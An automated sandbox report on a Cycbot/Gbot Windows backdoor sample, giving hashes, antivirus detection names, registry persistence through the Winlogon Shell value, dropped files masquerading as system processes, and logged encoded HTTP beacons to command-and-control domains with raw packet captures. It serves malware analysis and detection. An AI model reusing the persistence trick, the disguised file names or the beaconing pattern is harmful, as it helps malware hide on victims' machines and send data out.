Analysis Date2014-12-19 00:21:37
MD5189687a790eb77defcf34b0ac006eda9
SHA1cf41b036980a5dbf31b695fe61746fbd9e672a86

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 48792dbd681ea488d028a29f39941fbf sha1: 24c09ac028ca073fae358766d1698183526269f3 size: 111616
Section.rdata md5: a281fcaf4a471313967e35f6d4c1da21 sha1: 22253a28872043e979e903688b8a1acb46e67fc8 size: 1024
Section.data md5: b41674e6b5a72dd9471f9185847c3a21 sha1: 101c2dc0b54a76d60abc0ffc6d82ce8478ca539f size: 69632
Section.reloc md5: f3582a696031f3caee80026f1e6b4612 sha1: 10239964f1c297381ac57f916c8e4680da8e9754 size: 1024
Timestamp2005-10-09 12:29:22
PEhashc7588578d308d4fc2598f59cfbf15aac6628bb0f
IMPhasha718aae9b955ef501f9f22102a15477c
AV360 SafeGen:Heur.Conjar.5
AVAd-AwareGen:Heur.Conjar.5
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)Gen:Heur.Conjar.5
AVAuthentiumW32/Goolbot.K.gen!Eldorado
AVAvira (antivir)TR/Crypt.ZPACK.Gen
AVBullGuardGen:Heur.Conjar.5
AVCA (E-Trust Ino)Win32/Cycbot.G!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVWin.Trojan.Cycbot-2387
AVDr. WebBackDoor.Gbot.73 - infected, incurable
AVEmsisoftGen:Heur.Conjar.5
AVEset (nod32)Win32/Kryptik.TFW
AVFortinetW32/Kryptik.SMY!tr.bdr
AVFrisk (f-prot)W32/Goolbot.K.gen!Eldorado
AVF-SecureRogue:W32/OpenCloud.A
AVGrisoft (avg)Win32/Cryptor
AVIkarusBackdoor.Win32.Cycbot
AVK7Backdoor ( 003210941 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesBackdoor.Bot
AVMcafeeBackDoor-EXI.gen.n
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Heur.Conjar.5
AVRisingBackdoor.Win32.Cycbot.a
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Trojan
AVTrend MicroBKDR_CYCBOT.SME3
AVVirusBlokAda (vba32)SScope.Malware-Cryptor.Maxplus.0997

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Mutex{45BCA615-C82A-4152-8857-BCC626AE4C8D}
Creates Mutex{5A92A751-F926-4BB9-872E-BEC4A4CD571F}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNS127.0.0.1
Winsock DNSyourmediaresources.com
Winsock DNSonlinesearchdb.com
Winsock DNSnationsautoelectric.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNSnationsautoelectric.com
Type: A
98.139.135.198
DNSzonedg.com
Type: A
141.8.225.80
DNSzonedg.com
Type: A
141.8.225.80
DNSyourmediaresources.com
Type: A
DNSonlinesearchdb.com
Type: A
HTTP GEThttp://nationsautoelectric.com/images/50-217-1_F_1_.jpg?v65=65&tq=gHZutDyMv5rJfSG1J8K%2B1MWCJbP4lltXIA%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B82uYvEaSvT%2BsqNSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8CiYvEaS%2FT%2Bsqti8RpL6fhSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
Flows TCP192.168.1.1:1031 ➝ 98.139.135.198:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 35302d32   GET /images/50-2
0x00000010 (00016)   31372d31 5f465f31 5f2e6a70 673f7636   17-1_F_1_.jpg?v6
0x00000020 (00032)   353d3635 2674713d 67485a75 7444794d   5=65&tq=gHZutDyM
0x00000030 (00048)   7635724a 66534731 4a384b25 3242314d   v5rJfSG1J8K%2B1M
0x00000040 (00064)   57434a62 50346c6c 74584941 25334425   WCJbP4lltXIA%3D%
0x00000050 (00080)   33442048 5454502f 312e300d 0a436f6e   3D HTTP/1.0..Con
0x00000060 (00096)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000070 (00112)   486f7374 3a206e61 74696f6e 73617574   Host: nationsaut
0x00000080 (00128)   6f656c65 63747269 632e636f 6d0d0a41   oelectric.com..A
0x00000090 (00144)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x000000a0 (00160)   2d416765 6e743a20 6d6f7a69 6c6c612f   -Agent: mozilla/
0x000000b0 (00176)   322e300d 0a0d0a                       2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42383275 59764561 53765425   ij%2B82uYvEaSvT%
0x000000c0 (00192)   32427371 4e537225 32466525 32425635   2BsqNSr%2Fe%2BV5
0x000000d0 (00208)   5a755267 25334425 33442048 5454502f   ZuRg%3D%3D HTTP/
0x000000e0 (00224)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000f0 (00240)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x00000100 (00256)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000110 (00272)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000120 (00288)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000130 (00304)   6c6f7365 0d0a0d0a                     lose....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42387976 55712532 4633766c   ij%2B8yvUq%2F3vl
0x000000c0 (00192)   6557626b 59253344 20485454 502f312e   eWbkY%3D HTTP/1.
0x000000d0 (00208)   310d0a48 6f73743a 207a6f6e 6564672e   1..Host: zonedg.
0x000000e0 (00224)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000f0 (00240)   206d6f7a 696c6c61 2f322e30 0d0a436f    mozilla/2.0..Co
0x00000100 (00256)   6e74656e 742d4c65 6e677468 3a20300d   ntent-Length: 0.
0x00000110 (00272)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000120 (00288)   73650d0a 0d0a616e 642e3c2f 703e0a20   se....and.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42384369 59764561 53253246   ij%2B8CiYvEaS%2F
0x000000c0 (00192)   54253242 73717469 3852704c 36666853   T%2Bsqti8RpL6fhS
0x000000d0 (00208)   72253246 65253242 56355a75 52672533   r%2Fe%2BV5ZuRg%3
0x000000e0 (00224)   44253344 20485454 502f312e 310d0a48   D%3D HTTP/1.1..H
0x000000f0 (00240)   6f73743a 207a6f6e 6564672e 636f6d0d   ost: zonedg.com.
0x00000100 (00256)   0a557365 722d4167 656e743a 206d6f7a   .User-Agent: moz
0x00000110 (00272)   696c6c61 2f322e30 0d0a436f 6e74656e   illa/2.0..Conten
0x00000120 (00288)   742d4c65 6e677468 3a20300d 0a436f6e   t-Length: 0..Con
0x00000130 (00304)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000140 (00320)   0d0a                                  ..


Strings
E
.UB
.
<
.q~".
  v
.
.N
..
5..0.
..
.
.
080904b0
1.0.0.1
1468
FileVersion
&find
&Find any        Alt+F
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
~~~~~~
~~~~~~~~
~~~~~~~~~~~~~
========
=========
>>>>>>
>>>>>>>>>>>>>>>
      
 @ !]`
 &``~$@
------
,,,,,,,,,
,,,,,,,,,,,,
:::::::
!!!!!!
????????
//////
""""""
""""""""
"""""""""
""""""""""
(((((((
)))))))
))))))))
))))))))))))
]?????
]]]]]]]]
{)))))_____
{{{{###
@ ``.`
@ ;^>*@ 
$ ` `@
$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
*******
*******************
\\\\\\\\
%%%%%%
%%%%%%###
++++++
+++++++++++
++++++++++++++++++++++++
`0aKl7
0EAHBX
0)	fb#
0S{OSW
!-0|vM
0x*``|
1111111
##11111111111
>16%.4.
)16p0,
/	1h{5+
 @	1{i
2222222
2f(.ACQO
2X:QkS(
>3];0|
333^^^
333333
333333333```````````````````````w
3A1Zk5e
_3>H1}
3I(kYFR
[=3kJ=
}3%X;^k
3Yb~wyq}
4"A^`Y
4}d5E@k
|4:l1*@ 
4NnB*`
4WjM@^M
'}4XSn
$ `4Z%
~555555555
5.6)(5
)5N75[RBJ
'65\OrD3k
66#####
66&`@5
)6)f4r
6?)h*` eB8
:#6Mjl
"  6Y+
++7777
7   j_.
7*@ V_
888888
8888888
8888888?
8@@kkkkkk
(8V.q;
@!,9/3P%
97( @|
))))990T
a2(,ZZ3
a3Bt-l
 A/5BYsS!
?;)ABV
A>D.Hf(
A|eEu;
a	{[q	LsU
A|VLmP['
axq!P=
a y?ZY
bbbbbbbbbb555
BBBBBBBBBBBBBBBB
bbb))))))))))))))UU
. `Bb^Y
,  bdzW,@@
;BHl7q,h
B*` kY-#
<bp&E[e
}, `BR
@@b>RU
#{bxDg
`\C$@@
C|8gC~
ccccc----
CCCCCC%%
ccccDDDHHH888888888888888888888
cggggg													.....
`@cHbV 
ClipCursor
Clk	^)
CLq~&^
cM'N|g*
?CoVHr
 C}@q?P
CreatePopupMenu
)\crnoK
C	xJ0Q
c^Yb)Y-
CyT* `"
~])d``_
@.data
DDDDDDDDDD%%%%%%
DDDDDDDDDDDDDDD
DDDDDDDDDD			xxTT
DDDDOOO666666
DestroyMenu
`dI)<&
DuplicateHandle
dwZb6l&
\dYt!0N
e& @2uX
e:3}p}d
 @E;bx
eee^^^^^^
EEEEEE
EEEEEEEE
EEEEEEEEEEE
eeeeooooooo
#efJPW
Eh|Y}s
EnumResourceNamesW
:ex}6G
  _ey`>
F*%5n9
F-ap$J
fD%O?*-V_H
fffffI:::::
FindClose
FindFirstFileA
FindResourceExA
FindWindowA
Fk)]So
FlushInstructionCache
F?,@`Z6
G5$5XA
g5v}Rg
`#!G=6
@@g6F#
 G7|wTB
:@gC:>H
GetDesktopWindow
GetModuleFileNameW
%%%%%%GG
GGGGG^
gggggg
ggggggggg
ggggggggggggg
GjDSa-
>G<VE{/
:g}W3@
 H  `eRx7-
H@e_z$
h*Fa,@
hhhhhhh
HHHHHHH
hhhhhhhhhhhhh=======```
H#- J"x[
%(I3j}
I55555
Ic<_n0k)
Ii4]`:
iiiiEEEEEEEE
IIIIII
IKKKKKKKKKKDDDDDD
i~n* @
``iP7\q
Iur>YtcY
i*``+W
@ixI'@X
J5PwHv
(JcWrdI
JEcWy[
JJ/~~~~
JJJJ[[[[[[[[[[[[[[
JJJJJJJJJ
JJJJJJJJJJJJJJJJJJJJJTTTTTTTTTTTT
JJJJJJJJJ@k2222222222222
jjjMMMMMnnnnnooo
jjlllXXXXXXX
)JmV[(
jP8NQp'
J}T#u8
k5@).e
(}k5GS
@ kaY4>xzy\1
@K!drA
K+<Eoy
KERNEL32.dll
kkkk!I
KKKKKK
KKKKKKK(((((((bbc
kkkkkkkkkkk
knZ1f@vz
k_[o,`
 `K<U99
+Ky<;5
!.@ Kz
k	Z}7?
& `l.`
&@@)+l
l& `02
l5W!wC
l=89A;?
L'AnB:
lj4NjH
LLLLLL
///LLLLLLLLL
lllvvv#######
l\M/!SQ
LqsqqWl
LWBbw?
lZ>$  <
lzo^t5 @
:M/1s=T
MapViewOfFile
M&@@d6D
+~MIJ*@`s
m<I/rq5
]]>>mmm
|^^^MMMMM
mmmmmm\\\\
mmmmmmmm
MMMMMMMM:::::
MMMMMOO
M!-n'd/
MN( @T
mPA"Cb
  mtkqb
~$M,w\0!
m]wQ5B
N6~b"uYU
nA?615
-NBxP3
n?CBnX
NdrComplexArrayFree
@@NI%l
nnnn++++++
nnnnnnnnnn 
nW/|:"
`o^<,'#
((((((O
OEl]3;
@O'F0p[
`/OfrI
OfybkA
ol!?-}
@`Om:~[
))))OOOOO
<ooooooo
oooooooooo
oooooooooooo
P;;;;;;
P{*@@`
P_2fo%
>	p_3t
 pAz<X
@ ]P)E{j
p=g!glyx{j
?pPa68?~;q
pppppp
_P@TWX
PV#S\9
`pwU%<5EG
--------Pz
\(@ Q\
 " `Q7
QC"@`Y9
 @QJQ/ 
QmDs}!
q_o(@ )
@Q"@@	o
#q(=[p
QQQQQQQQQQQQQQQ
 @QUnS
QV8FsV
q`  `Y
r4`(@`EF
r6n	%A
 r^?9k
.``rA%
}rbggN
R:c^&@`
}rD00G
`.rdata
>RdeA	5
RedrawWindow
.reloc
+:RHri
RPCRT4.dll
@`\RRG
rR<hW:;
RRRRRRRIIIIIIIIUVVVVVVVV
r_T*dN
RW({0	
R*[ZV|
`@S @@
S@^ACW
SetEnvironmentVariableW
SHELL32.dll
Shell_NotifyIconA
/sje@oc
s" @r6
./s&[S
SSSSSddddddddd##
SSSSSSb
SSSSSSSSSSNNN
SSSSSSSSSSS
T=,9zS
 t_[AH
[tBj\@
T_DrFU
Tftq10
!This program cannot be run in DOS mode.
timeEndPeriod
tkTa;#S
tnmE'v&
<TNT1"
T,'Q0,U.YGA
TrackPopupMenuEx
TT,,,,,
ttttttt&
tttttttttEEE
TTTTTTTTTTTkkkkkkk
tttttttttttt
`<!TY^3B:
];,@ U
 u2^{m
^u]A\yT
@)ueI=
u<_i0w
UKR;_g
@U!kVM
UnmapViewOfFile
>}UR&K
USER32
UuidCreate
uuuuu%%%%%%%%%%%%%%%
uuuuuuu
uuuuuuuu
UUUUUUUU
U-Vl+V
)U}VO\
v1z~_qX
vB,5YSJ
VbN75u
*` VLc
 @@`{vO
   vQ#
*`@VQT
vs/'z-
VVVVVV
VVVVVVVVVVe
[VVVVVVVVVVVVVVVVVVccc
vvvvvyyy
--|vvvvW
(vz=*&
w5dlYXL
	W<BSu]
 @wDS1
*weV>u:
Wf4B8@
W|i<)J
WINMM.dll
$Wk$6W
  wL]8
WMjHW>i
 `wO	c
W[[!ow
WWo?oYx
}}}}}}wwwwww
WWWWWW
wwwwwww
wwwwwwwnnnnnnn
WWWWWWWWW
Wyg @`IK;
@`:xD&
xiq]<$
 @XnQ"
XtkiZUgOjTS
.XVDGP
xxxxxxxxx
XXXXXXXXXXXXXXX
@y:(@ '2
 y2c]f
\Y7ham
Y=A	=H
y$	~AnF
Y_CdC~
``Yc\gO
yfUQzH
Yg	U=y
YH}fOPy
Y.I8xlP;
y+|]#J
!yJU/.
y&QWjt
YYYYlll
YYYYYY
"Z;4~OR
~#Z~%5
,``ZDU
`zePIw
z{~F;&\^t
Z]Hm|zX$`@
ZMzB]I
Z@n!bS[
zO0)Ni
ZOi]Ct)
zpeqa-
Z.``'Q
&%<Zq7
Z	R>aH
z:S"f'
:zTTrz%i
```````zzzXXXXXXXXXXX
zzzzzzzzzzz